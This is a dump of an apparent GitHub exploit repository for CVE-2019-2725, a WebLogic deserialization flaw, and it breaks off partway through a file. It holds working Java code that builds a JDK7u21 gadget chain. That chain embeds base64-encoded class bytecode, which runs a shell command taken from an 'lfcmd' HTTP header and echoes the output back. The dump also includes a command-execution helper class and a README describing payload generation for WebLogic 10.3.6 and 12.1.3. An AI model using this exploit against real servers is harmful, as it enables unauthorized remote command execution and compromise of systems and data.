├── 10.0.3效果图.jpg ├── 12.1.3效果图.jpg ├── CVE-2019-2725.py ├── JDK7u21.java ├── README.md ├── ResultBaseExec.java ├── weblogic-2019-2725-12.1.3回显检测.txt ├── weblogic-2019-2725_10.3.6命令执行.txt ├── weblogic-2019-2725_10.3.6回显检测.txt └── weblogic-2019-2725_12.1.3命令执行.txt /10.0.3效果图.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lufeirider/CVE-2019-2725/e34b9875823baf570d2d49c42207156cb4f5a722/10.0.3效果图.jpg -------------------------------------------------------------------------------- /12.1.3效果图.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lufeirider/CVE-2019-2725/e34b9875823baf570d2d49c42207156cb4f5a722/12.1.3效果图.jpg -------------------------------------------------------------------------------- /JDK7u21.java: -------------------------------------------------------------------------------- 1 | package JDK7u21; 2 | 3 | import com.sun.org.apache.xalan.internal.xsltc.DOM; 4 | import com.sun.org.apache.xalan.internal.xsltc.TransletException; 5 | import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; 6 | import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; 7 | import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; 8 | import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; 9 | import com.sun.org.apache.xml.internal.serializer.SerializationHandler; 10 | import javassist.ClassClassPath; 11 | import javassist.ClassPool; 12 | import javassist.CtClass; 13 | import org.apache.commons.io.FileUtils; 14 | import weblogic.servlet.internal.ServletOutputStreamImpl; 15 | import weblogic.servlet.internal.ServletResponseImpl; 16 | import weblogic.xml.util.StringInputStream; 17 | 18 | import javax.xml.transform.Templates; 19 | import java.beans.XMLEncoder; 20 | import java.io.*; 21 | import java.lang.reflect.*; 22 | import java.util.HashMap; 23 | import java.util.LinkedHashSet; 24 | 25 | 26 | class Reflections { 27 | 28 | public static Field getField(final Class clazz, final String fieldName) throws Exception { 29 | Field field = clazz.getDeclaredField(fieldName); 30 | if (field != null) 31 | field.setAccessible(true); 32 | else if (clazz.getSuperclass() != null) 33 | field = getField(clazz.getSuperclass(), fieldName); 34 | return field; 35 | } 36 | 37 | public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception { 38 | final Field field = getField(obj.getClass(), fieldName); 39 | field.set(obj, value); 40 | } 41 | 42 | public static Constructor getFirstCtor(final String name) throws Exception { 43 | final Constructor ctor = Class.forName(name).getDeclaredConstructors()[0]; 44 | ctor.setAccessible(true); 45 | return ctor; 46 | } 47 | } 48 | 49 | class ClassFiles { 50 | public static String classAsFile(final Class clazz) { 51 | return classAsFile(clazz, true); 52 | } 53 | 54 | public static String classAsFile(final Class clazz, boolean suffix) { 55 | String str; 56 | if (clazz.getEnclosingClass() == null) { 57 | str = clazz.getName().replace(".", "/"); 58 | } else { 59 | str = classAsFile(clazz.getEnclosingClass(), false) + "$" + clazz.getSimpleName(); 60 | } 61 | if (suffix) { 62 | str += ".class"; 63 | } 64 | return str; 65 | } 66 | 67 | public static byte[] classAsBytes(final Class clazz) { 68 | try { 69 | final byte[] buffer = new byte[1024]; 70 | final String file = classAsFile(clazz); 71 | final InputStream in = ClassFiles.class.getClassLoader().getResourceAsStream(file); 72 | if (in == null) { 73 | throw new IOException("couldn't find '" + file + "'"); 74 | } 75 | final ByteArrayOutputStream out = new ByteArrayOutputStream(); 76 | int len; 77 | while ((len = in.read(buffer)) != -1) { 78 | out.write(buffer, 0, len); 79 | } 80 | return out.toByteArray(); 81 | } catch (IOException e) { 82 | throw new RuntimeException(e); 83 | } 84 | } 85 | 86 | } 87 | 88 | class Gadgets { 89 | static { 90 | // special case for using TemplatesImpl gadgets with a SecurityManager enabled 91 | } 92 | 93 | public static class StubTransletPayload extends AbstractTranslet implements Serializable { 94 | private static final long serialVersionUID = -5971610431559700674L; 95 | 96 | public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {} 97 | 98 | @Override 99 | public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {} 100 | } 101 | 102 | // required to make TemplatesImpl happy 103 | public static class Foo implements Serializable { 104 | private static final long serialVersionUID = 8207363842866235160L; 105 | } 106 | 107 | public static T createProxy(final InvocationHandler ih, final Class iface, final Class ... ifaces) { 108 | final Class[] allIfaces 109 | = (Class[]) Array.newInstance(Class.class, ifaces.length + 1); 110 | allIfaces[0] = iface; 111 | if (ifaces.length > 0) { 112 | System.arraycopy(ifaces, 0, allIfaces, 1, ifaces.length); 113 | } 114 | return iface.cast( 115 | Proxy.newProxyInstance(Gadgets.class.getClassLoader(), allIfaces , ih)); 116 | } 117 | 118 | public static TemplatesImpl createTemplatesImpl(final String command) throws Exception { 119 | final TemplatesImpl templates = new TemplatesImpl(); 120 | 121 | // use template gadget class 122 | 123 | // 获取容器ClassPool,注入classpath 124 | ClassPool pool = ClassPool.getDefault(); 125 | System.out.println("insertClassPath: " + new ClassClassPath(StubTransletPayload.class)); 126 | pool.insertClassPath(new ClassClassPath(StubTransletPayload.class)); 127 | 128 | // 获取已经编译好的类 129 | System.out.println("ClassName: " + StubTransletPayload.class.getName()); 130 | final CtClass clazz = pool.get(StubTransletPayload.class.getName()); 131 | 132 | // // 在静态的的构造方法中插入payload 133 | // clazz.makeClassInitializer() 134 | // .insertAfter("java.lang.Runtime.getRuntime().exec(\"" 135 | // + command.replaceAll("\"", "\\\"") 136 | // + "\");"); 137 | 138 | 139 | // // 在静态的的构造方法中插入payload 140 | // clazz.makeClassInitializer() 141 | // .insertAfter("String R = \"yv66vgAAADIAfgoAGgBIBwBJCgACAEoHAEsKAAQATAoAAgBNCgAEAE4KAAIATwoABABQCgBRAFIKAFEAUwoAVABVCgAZAFYKAFQAVwoAVABYBwBZBwBaCgARAEgIAFsKABEAXAcAXQoAFQBeCgARAF8KABAAYAcAYQcAYgEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAPTEVycm9yQmFzZUV4ZWM7AQAJcmVhZEJ5dGVzAQAZKExqYXZhL2lvL0lucHV0U3RyZWFtOylbQgEAAmluAQAVTGphdmEvaW8vSW5wdXRTdHJlYW07AQAFYnVmaW4BAB1MamF2YS9pby9CdWZmZXJlZElucHV0U3RyZWFtOwEACGJ1ZmZTaXplAQABSQEAA291dAEAH0xqYXZhL2lvL0J5dGVBcnJheU91dHB1dFN0cmVhbTsBAAR0ZW1wAQACW0IBAARzaXplAQAHY29udGVudAEADVN0YWNrTWFwVGFibGUHAGMHAEkHAEsHAC0BAApFeGNlcHRpb25zBwBkAQAHZG9fZXhlYwEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAA2NtZAEAEkxqYXZhL2xhbmcvU3RyaW5nOwEAAXABABNMamF2YS9sYW5nL1Byb2Nlc3M7AQAGc3RkZXJyAQAGc3Rkb3V0AQAJZXhpdFZhbHVlBwBdBwBlAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBACdFcnJvckJhc2VFeGVjLmphdmEgZnJvbSBJbnB1dEZpbGVPYmplY3QMABsAHAEAG2phdmEvaW8vQnVmZmVyZWRJbnB1dFN0cmVhbQwAGwBmAQAdamF2YS9pby9CeXRlQXJyYXlPdXRwdXRTdHJlYW0MABsAZwwAaABpDABqAGsMAGwAHAwAbQBuBwBvDABwAHEMAHIAcwcAZQwAdAB1DAAiACMMAHYAdQwAdwB4AQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyAQATLS0tLS0tLS0tLS0tLS0tLS0NCgwAeQB6AQAQamF2YS9sYW5nL1N0cmluZwwAGwB7DAB8AH0MABsAOAEADUVycm9yQmFzZUV4ZWMBABBqYXZhL2xhbmcvT2JqZWN0AQATamF2YS9pby9JbnB1dFN0cmVhbQEAE2phdmEvaW8vSU9FeGNlcHRpb24BABFqYXZhL2xhbmcvUHJvY2VzcwEAGChMamF2YS9pby9JbnB1dFN0cmVhbTspVgEABChJKVYBAARyZWFkAQAFKFtCKUkBAAV3cml0ZQEAByhbQklJKVYBAAVjbG9zZQEAC3RvQnl0ZUFycmF5AQAEKClbQgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRFcnJvclN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAOZ2V0SW5wdXRTdHJlYW0BAAd3YWl0Rm9yAQADKClJAQAGYXBwZW5kAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7AQAFKFtCKVYBAAh0b1N0cmluZwEAFCgpTGphdmEvbGFuZy9TdHJpbmc7ACEAGQAaAAAAAAAEAAEAGwAcAAEAHQAAAC8AAQABAAAABSq3AAGxAAAAAgAeAAAABgABAAAABAAfAAAADAABAAAABQAgACEAAAAJACIAIwACAB0AAADsAAQABwAAAES7AAJZKrcAA0wRBAA9uwAEWRy3AAVOHLwIOgQDNgUrGQS2AAZZNgUCnwAPLRkEAxUFtgAHp//qK7YACC22AAk6BhkGsAAAAAMAHgAAACoACgAAAAcACQAIAA0ACQAWAAoAGwALAB4ADQArAA4ANwARADsAEwBBABUAHwAAAEgABwAAAEQAJAAlAAAACQA7ACYAJwABAA0ANwAoACkAAgAWAC4AKgArAAMAGwApACwALQAEAB4AJgAuACkABQBBAAMALwAtAAYAMAAAABgAAv8AHgAGBwAxBwAyAQcAMwcANAEAABgANQAAAAQAAQA2AAkANwA4AAIAHQAAAPcABgAFAAAAcbgACiq2AAtMK7YADLgADU0rtgAOuAANTiu2AA82BBUEmgAquwAQWbsAEVm3ABISE7YAFLsAFVkttwAWtgAUEhO2ABS2ABe3ABi/uwAQWbsAEVm3ABISE7YAFLsAFVkstwAWtgAUEhO2ABS2ABe3ABi/AAAAAwAeAAAAHgAHAAAAGgAIABsAEAAcABgAHQAeAB8AIwAgAEoAIgAfAAAANAAFAAAAcQA5ADoAAAAIAGkAOwA8AAEAEABhAD0ALQACABgAWQA+AC0AAwAeAFMAPwApAAQAMAAAABYAAf8ASgAFBwBABwBBBwA0BwA0AQAAADUAAAAEAAEAEAAJAEIAQwACAB0AAAArAAAAAQAAAAGxAAAAAgAeAAAABgABAAAAOQAfAAAADAABAAAAAQBEAEUAAAA1AAAABAABABAAAQBGAAAAAgBH\";" 142 | // + "sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder();" 143 | // + "byte[] bt = decoder.decodeBuffer(R);" 144 | // + "org.mozilla.classfile.DefiningClassLoader cls = new org.mozilla.classfile.DefiningClassLoader();" 145 | // + "Class cl = cls.defineClass(\"ErrorBaseExec\",bt);" 146 | // + "java.lang.reflect.Method m = cl.getMethod(\"do_exec\",new Class[]{String.class});" 147 | // + "m.invoke(cl.newInstance(),new Object[]{\"calc\"});" 148 | // + ""); 149 | 150 | // // 在静态的的构造方法中插入payload 151 | // clazz.makeClassInitializer() 152 | // .insertAfter("String R = \"yv66vgAAADIAfgoAGgBIBwBJCgACAEoHAEsKAAQATAoAAgBNCgAEAE4KAAIATwoABABQCgBRAFIKAFEAUwoAVABVCgAZAFYKAFQAVwoAVABYBwBZBwBaCgARAEgIAFsKABEAXAcAXQoAFQBeCgARAF8KABAAYAcAYQcAYgEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAPTEVycm9yQmFzZUV4ZWM7AQAJcmVhZEJ5dGVzAQAZKExqYXZhL2lvL0lucHV0U3RyZWFtOylbQgEAAmluAQAVTGphdmEvaW8vSW5wdXRTdHJlYW07AQAFYnVmaW4BAB1MamF2YS9pby9CdWZmZXJlZElucHV0U3RyZWFtOwEACGJ1ZmZTaXplAQABSQEAA291dAEAH0xqYXZhL2lvL0J5dGVBcnJheU91dHB1dFN0cmVhbTsBAAR0ZW1wAQACW0IBAARzaXplAQAHY29udGVudAEADVN0YWNrTWFwVGFibGUHAGMHAEkHAEsHAC0BAApFeGNlcHRpb25zBwBkAQAHZG9fZXhlYwEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAA2NtZAEAEkxqYXZhL2xhbmcvU3RyaW5nOwEAAXABABNMamF2YS9sYW5nL1Byb2Nlc3M7AQAGc3RkZXJyAQAGc3Rkb3V0AQAJZXhpdFZhbHVlBwBdBwBlAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBACdFcnJvckJhc2VFeGVjLmphdmEgZnJvbSBJbnB1dEZpbGVPYmplY3QMABsAHAEAG2phdmEvaW8vQnVmZmVyZWRJbnB1dFN0cmVhbQwAGwBmAQAdamF2YS9pby9CeXRlQXJyYXlPdXRwdXRTdHJlYW0MABsAZwwAaABpDABqAGsMAGwAHAwAbQBuBwBvDABwAHEMAHIAcwcAZQwAdAB1DAAiACMMAHYAdQwAdwB4AQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyAQATLS0tLS0tLS0tLS0tLS0tLS0NCgwAeQB6AQAQamF2YS9sYW5nL1N0cmluZwwAGwB7DAB8AH0MABsAOAEADUVycm9yQmFzZUV4ZWMBABBqYXZhL2xhbmcvT2JqZWN0AQATamF2YS9pby9JbnB1dFN0cmVhbQEAE2phdmEvaW8vSU9FeGNlcHRpb24BABFqYXZhL2xhbmcvUHJvY2VzcwEAGChMamF2YS9pby9JbnB1dFN0cmVhbTspVgEABChJKVYBAARyZWFkAQAFKFtCKUkBAAV3cml0ZQEAByhbQklJKVYBAAVjbG9zZQEAC3RvQnl0ZUFycmF5AQAEKClbQgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRFcnJvclN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAOZ2V0SW5wdXRTdHJlYW0BAAd3YWl0Rm9yAQADKClJAQAGYXBwZW5kAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7AQAFKFtCKVYBAAh0b1N0cmluZwEAFCgpTGphdmEvbGFuZy9TdHJpbmc7ACEAGQAaAAAAAAAEAAEAGwAcAAEAHQAAAC8AAQABAAAABSq3AAGxAAAAAgAeAAAABgABAAAABAAfAAAADAABAAAABQAgACEAAAAJACIAIwACAB0AAADsAAQABwAAAES7AAJZKrcAA0wRBAA9uwAEWRy3AAVOHLwIOgQDNgUrGQS2AAZZNgUCnwAPLRkEAxUFtgAHp//qK7YACC22AAk6BhkGsAAAAAMAHgAAACoACgAAAAcACQAIAA0ACQAWAAoAGwALAB4ADQArAA4ANwARADsAEwBBABUAHwAAAEgABwAAAEQAJAAlAAAACQA7ACYAJwABAA0ANwAoACkAAgAWAC4AKgArAAMAGwApACwALQAEAB4AJgAuACkABQBBAAMALwAtAAYAMAAAABgAAv8AHgAGBwAxBwAyAQcAMwcANAEAABgANQAAAAQAAQA2AAkANwA4AAIAHQAAAPcABgAFAAAAcbgACiq2AAtMK7YADLgADU0rtgAOuAANTiu2AA82BBUEmgAquwAQWbsAEVm3ABISE7YAFLsAFVkttwAWtgAUEhO2ABS2ABe3ABi/uwAQWbsAEVm3ABISE7YAFLsAFVkstwAWtgAUEhO2ABS2ABe3ABi/AAAAAwAeAAAAHgAHAAAAGgAIABsAEAAcABgAHQAeAB8AIwAgAEoAIgAfAAAANAAFAAAAcQA5ADoAAAAIAGkAOwA8AAEAEABhAD0ALQACABgAWQA+AC0AAwAeAFMAPwApAAQAMAAAABYAAf8ASgAFBwBABwBBBwA0BwA0AQAAADUAAAAEAAEAEAAJAEIAQwACAB0AAAArAAAAAQAAAAGxAAAAAgAeAAAABgABAAAAOQAfAAAADAABAAAAAQBEAEUAAAA1AAAABAABABAAAQBGAAAAAgBH\";" 153 | // + "sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder();" 154 | // + "byte[] bt = decoder.decodeBuffer(R);" 155 | // + "org.mozilla.classfile.DefiningClassLoader cls = new org.mozilla.classfile.DefiningClassLoader();" 156 | // + "Class cl = cls.defineClass(\"ErrorBaseExec\",bt);" 157 | // + "cl.newInstance().getClass().getMethod(\"do_exec\", new Class[]{String.class}).invoke(cl.newInstance(),new Object[]{\"calc\"});" 158 | // + ""); 159 | 160 | // // getWriter返回1111111111 161 | // clazz.makeClassInitializer() 162 | // .insertAfter("" 163 | // + "((weblogic.servlet.internal.ServletRequestImpl)((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()).getResponse().getWriter().write(\"test webloigc cve_2019_2725\");" 164 | // + ""); 165 | 166 | // // getServletOutputStream返回xxxxxxxxxxx 167 | // clazz.makeClassInitializer() 168 | // .insertAfter("" 169 | // + "weblogic.servlet.internal.ServletResponseImpl response = ((weblogic.servlet.internal.ServletRequestImpl)((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()).getResponse();\n" 170 | // + "weblogic.servlet.internal.ServletOutputStreamImpl outputStream = response.getServletOutputStream();\n" 171 | // + "outputStream.writeStream(new weblogic.xml.util.StringInputStream(\"test webloigc cve_2019_2725\"));\n" 172 | // + "outputStream.flush();\n" 173 | // + ""); 174 | 175 | // // 接受headers返回lfcmd 176 | // clazz.makeClassInitializer() 177 | // .insertAfter("" 178 | // + "String lfcmd = ((weblogic.servlet.internal.ServletRequestImpl)((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()).getHeader(\"lfcmd\");\n" 179 | // + "weblogic.servlet.internal.ServletResponseImpl response = ((weblogic.servlet.internal.ServletRequestImpl)((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()).getResponse();\n" 180 | // + "weblogic.servlet.internal.ServletOutputStreamImpl outputStream = response.getServletOutputStream();\n" 181 | // + "outputStream.writeStream(new weblogic.xml.util.StringInputStream(lfcmd));\n" 182 | // + "outputStream.flush();\n" 183 | // + "response.getWriter().write(\"\");" 184 | // + ""); 185 | 186 | // 返回执行命令 187 | clazz.makeClassInitializer() 188 | .insertAfter("" 189 | + "String ua = ((weblogic.servlet.internal.ServletRequestImpl)((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()).getHeader(\"lfcmd\");\n" 190 | + "String R = \"yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7\";" 191 | + "sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder();" 192 | + "byte[] bt = decoder.decodeBuffer(R);" 193 | + "org.mozilla.classfile.DefiningClassLoader cls = new org.mozilla.classfile.DefiningClassLoader();" 194 | + "Class cl = cls.defineClass(\"ResultBaseExec\",bt);" 195 | + "java.lang.reflect.Method m = cl.getMethod(\"do_exec\",new Class[]{String.class});" 196 | + "Object object = m.invoke(cl.newInstance(),new Object[]{ua});" 197 | + "weblogic.servlet.internal.ServletResponseImpl response = ((weblogic.servlet.internal.ServletRequestImpl)((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()).getResponse();\n" 198 | + "weblogic.servlet.internal.ServletOutputStreamImpl outputStream = response.getServletOutputStream();\n" 199 | + "outputStream.writeStream(new weblogic.xml.util.StringInputStream(object.toString()));\n" 200 | + "outputStream.flush();\n" 201 | + "response.getWriter().write(\"\");" 202 | + ""); 203 | 204 | 205 | 206 | // 给payload类设置一个名称 207 | // unique name to allow repeated execution (watch out for PermGen exhaustion) 208 | clazz.setName("ysoserial.Pwner" + System.nanoTime()); 209 | 210 | // 获取该类的字节码 211 | final byte[] classBytes = clazz.toBytecode(); 212 | 213 | // inject class bytes into instance 214 | Reflections.setFieldValue( 215 | templates, 216 | "_bytecodes", 217 | new byte[][] { 218 | classBytes, 219 | ClassFiles.classAsBytes(Foo.class) 220 | }); 221 | 222 | // required to make TemplatesImpl happy 223 | Reflections.setFieldValue(templates, "_name", "Pwnr"); 224 | Reflections.setFieldValue(templates, "_tfactory", new TransformerFactoryImpl()); 225 | 226 | // 只要触发这个方法就能执行我们注入的bytecodes 227 | // templates.getOutputProperties(); 228 | return templates; 229 | } 230 | } 231 | 232 | 233 | 234 | public class JDK7u21 { 235 | 236 | public Object buildPayload(final String command) throws Exception { 237 | // generate evil templates,if we trigger templates.getOutputProperties(), we can execute command 238 | Object templates = Gadgets.createTemplatesImpl(command); 239 | 240 | // magic string, zeroHashCodeStr.hashCode() == 0 241 | String zeroHashCodeStr = "f5a5a608"; 242 | 243 | // build a hash map, and put our evil templates in it. 244 | HashMap map = new HashMap(); 245 | map.put(zeroHashCodeStr, "foo"); // Not necessary 246 | 247 | // Generate proxy's handler,use `AnnotationInvocationHandler` as proxy's handler 248 | // When proxy is done,all call proxy.anyMethod() will be dispatch to AnnotationInvocationHandler's invoke method. 249 | Constructor ctor = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructors()[0]; 250 | ctor.setAccessible(true); 251 | InvocationHandler tempHandler = (InvocationHandler) ctor.newInstance(Templates.class, map); 252 | // Reflections.setFieldValue(tempHandler, "type", Templates.class); // not necessary, because newInstance() already pass Templates.class to tempHandler 253 | Templates proxy = (Templates) Proxy.newProxyInstance(JDK7u21.class.getClassLoader(), templates.getClass().getInterfaces(), tempHandler); 254 | 255 | Reflections.setFieldValue(templates, "_auxClasses", null); 256 | Reflections.setFieldValue(templates, "_class", null); 257 | 258 | LinkedHashSet set = new LinkedHashSet(); // maintain order 259 | set.add(templates); // save evil templates 260 | set.add(proxy); // proxy 261 | 262 | map.put(zeroHashCodeStr, templates); 263 | 264 | return set; 265 | } 266 | 267 | public static void main(String[] args) throws Exception { 268 | JDK7u21 exploit = new JDK7u21(); 269 | Object payload = exploit.buildPayload("calc"); 270 | 271 | // test payload 272 | ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("d:/calc.bin")); 273 | oos.writeObject(payload); 274 | ObjectInputStream ois = new ObjectInputStream(new FileInputStream("d:/calc.bin")); 275 | ois.readObject(); 276 | 277 | byte[] payload_byte = FileUtils.readFileToByteArray(new File("d:/calc.bin")); 278 | XMLEncoder encoder = new XMLEncoder(new BufferedOutputStream(new FileOutputStream("d:/calc.xml"))); 279 | encoder.writeObject(payload_byte); 280 | encoder.close(); 281 | } 282 | 283 | } 284 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CVE-2019-2725 2 | 3 | CVE-2019-2725(CNVD-C-2019-48814、WebLogic wls9-async) 4 | 5 | # 命令回显 6 | 7 | ## 10.3.6 8 | ![10.0.3效果图](https://raw.githubusercontent.com/lufeirider/CVE-2019-2725/master/10.0.3%E6%95%88%E6%9E%9C%E5%9B%BE.jpg) 9 | 10 | ## 12.1.3 11 | ![12.1.3效果图](https://raw.githubusercontent.com/lufeirider/CVE-2019-2725/master/12.1.3%E6%95%88%E6%9E%9C%E5%9B%BE.jpg) 12 | 13 | 14 | # ResultBaseExec.java 15 | 用于测试defineClass,将把恶意类从base64还原出来,执行代码,主要是比较方便(可用可不用)。 16 | 17 | # JDK7u21.java 18 | 会生成weblogic-2019-2725_12.1.3命令执行.txt中的xml,请使用jdk6编译。 19 | 20 | # CVE-2019-2725.py 21 | 检测命令是否会执行。 22 | -------------------------------------------------------------------------------- /ResultBaseExec.java: -------------------------------------------------------------------------------- 1 | import java.io.*; 2 | 3 | public class ResultBaseExec { 4 | public static String do_exec(String cmd) throws Exception { 5 | 6 | String osTyp = System.getProperty("os.name"); 7 | Process p; 8 | if (osTyp != null && osTyp.toLowerCase().contains("win")) { 9 | //执行命令 10 | p = Runtime.getRuntime().exec(new String[]{"cmd.exe", "/c", cmd}); 11 | }else{ 12 | //执行命令 13 | p = Runtime.getRuntime().exec(new String[]{"/bin/sh", "-c", cmd}); 14 | 15 | } 16 | InputStream fis=p.getInputStream(); 17 | InputStreamReader isr=new InputStreamReader(fis); 18 | BufferedReader br=new BufferedReader(isr); 19 | String line=null; 20 | String result = ""; 21 | while((line=br.readLine())!=null) 22 | { 23 | result = result + line; 24 | } 25 | return result; 26 | } 27 | 28 | public static Object test_code(String cmd) throws Exception { 29 | //将这个java的class文件base64,生成如下东西 30 | String R = 